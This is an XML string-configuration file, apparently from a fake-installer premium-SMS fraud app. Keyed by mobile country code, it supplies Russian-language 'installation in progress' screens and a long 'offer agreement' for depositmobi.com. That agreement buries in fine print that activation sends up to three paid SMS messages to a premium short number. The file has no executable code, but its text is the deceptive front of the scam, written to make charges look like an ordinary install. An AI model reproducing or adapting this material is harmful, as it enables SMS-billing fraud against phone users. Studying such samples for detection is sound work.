<?xml version="1.0" encoding="utf-8"?>
<csTag>
    <countryTag>
        <mcc value="250"/>
        <firstText value="Производится установка *CNT_NAME* \10Текущий прогресс: "/>
        <secondText value="Установка завершена, для запуска нажмите кнопку Открыть"/>
    </countryTag>
    <countryTag>
        <mcc value="401"/>
        <firstText value="Производится установка *CNT_NAME* \10Текущий прогресс: "/>
        <secondText value="Установка завершена, для запуска нажмите кнопку Открыть"/>
    </countryTag>
    <countryTag>
        <mcc value="255"/>
        <firstText value="Производится установка *CNT_NAME* \10Текущий прогресс: "/>
        <secondText value="Для получения доступа к контенту вы должны согласиться с условиями, представленными ниже. Ниже представлен текст соглашения-оферты между сервисом http://depositmobi.com/ и Абонентом. 1. Для получения доступа к предоставляемому сервисом http://depositmobi.com/ контенту необходимо произвести оплату путем отправки до 3-х СМС-сообщений. 2. Администрация http://depositmobi.com/ не несет никакой ответственности за любой прямой или косвенный ущерб, возникший в результате использования приложения, включая упущенную прибыль и понесенные убытки. 3. При первом запуске приложений http://depositmobi.com/ запрашивается разрешение на передачу регистрационных данных на сервера http://depositmobi.com/ с использованием ПЛАТНОГО короткого номера. Для абонентов национальных GSM-операторов Украины оплата производится путем отправки одного смс-сообщения на короткий номер: 576 (10 гривен). Стоимость указана с НДС. Дополнительно удерживается налог в Пенсионный Фонд Украины в размере 7.5 от стоимости смс-сообщения без НДС. Услуга оказывается только для совершеннолетних. 4. Пользователь вправе отказать в передаче регистрационных данных. В таком случае приложения http://depositmobi.com/ остаются неактивированными. 5. Передача регистрационных данных является единоразовой процедурой. 6. Администрация http://depositmobi.com/ не несет никакой ответственности за попытки повторных запусков приложения и их последующую активацию. Повторный запуск и повторная активация является необязательной процедурой активации приложения. Администрация http://depositmobi.com/ не рассматривает жалобы, касаемые повторных запусков и активаций. 7. Администрация http://depositmobi.com/ не несет никакой ответственности за содержание приложений, доступ к которым оплачивается через приложение http://depositmobi.com/. Вся ответственность за содержание приложений лежит на владельце контента, доступ к которому оплачивается с использованием приложения http://depositmobi.com/. 8. В случае обнаружения спама или иных запрещенных методов распространения приложений, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов Контент-Провайдера через веб-сайт: zipwap.ru@gmail.com с обязательным указанием ID приложения. 9. Абонент вправе обжаловать процедуру списания средств со счета в случаях, если заявленный в названии и описании контент не был предоставлен после успешной активации приложения. Для этого необходимо обратиться в Службу поддержки Абонентов через веб-сайт: http://www.sms911.ru с обязательным указанием ID приложения."/>
    </countryTag>
    <countryTag>
        <mcc value="2"/>
        <firstText value="Производится установка *CNT_NAME* \10Текущий прогресс: "/>
        <secondText value="Установка завершена, для запуска нажмите кнопку Открыть"/>
    </countryTag>
    <countryTag>
        <mcc value="10000"/>
        <firstText value="Производится установка *CNT_NAME* \10Текущий прогресс: "/>
        <secondText value="Для получения доступа к контенту вы должны согласиться с условиями, представленными ниже. Ниже представлен текст соглашения-оферты между сервисом http://depositmobi.com/ и Абонентом. 1. Для получения доступа к предоставляемому сервисом http://depositmobi.com/ контенту необходимо произвести оплату путем отправки до 3-х СМС-сообщений. 2. Администрация http://depositmobi.com/ не несет никакой ответственности за любой прямой или косвенный ущерб, возникший в результате использования приложения, включая упущенную прибыль и понесенные убытки. 3. При первом запуске приложений http://depositmobi.com/ запрашивается разрешение на передачу регистрационных данных на сервера http://depositmobi.com/ с использованием ПЛАТНОГО короткого номера. Для абонентов национальных GSM-операторов Украины оплата производится путем отправки одного смс-сообщения на короткий номер: 576 (10 гривен). Стоимость указана с НДС. Дополнительно удерживается налог в Пенсионный Фонд Украины в размере 7.5 от стоимости смс-сообщения без НДС. Услуга оказывается только для совершеннолетних. 4. Пользователь вправе отказать в передаче регистрационных данных. В таком случае приложения http://depositmobi.com/ остаются неактивированными. 5. Передача регистрационных данных является единоразовой процедурой. 6. Администрация http://depositmobi.com/ не несет никакой ответственности за попытки повторных запусков приложения и их последующую активацию. Повторный запуск и повторная активация является необязательной процедурой активации приложения. Администрация http://depositmobi.com/ не рассматривает жалобы, касаемые повторных запусков и активаций. 7. Администрация http://depositmobi.com/ не несет никакой ответственности за содержание приложений, доступ к которым оплачивается через приложение http://depositmobi.com/. Вся ответственность за содержание приложений лежит на владельце контента, доступ к которому оплачивается с использованием приложения http://depositmobi.com/. 8. В случае обнаружения спама или иных запрещенных методов распространения приложений, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов Контент-Провайдера через веб-сайт: zipwap.ru@gmail.com с обязательным указанием ID приложения. 9. Абонент вправе обжаловать процедуру списания средств со счета в случаях, если заявленный в названии и описании контент не был предоставлен после успешной активации приложения. Для этого необходимо обратиться в Службу поддержки Абонентов через веб-сайт: http://www.sms911.ru с обязательным указанием ID приложения."/>
    </countryTag>
</csTag>
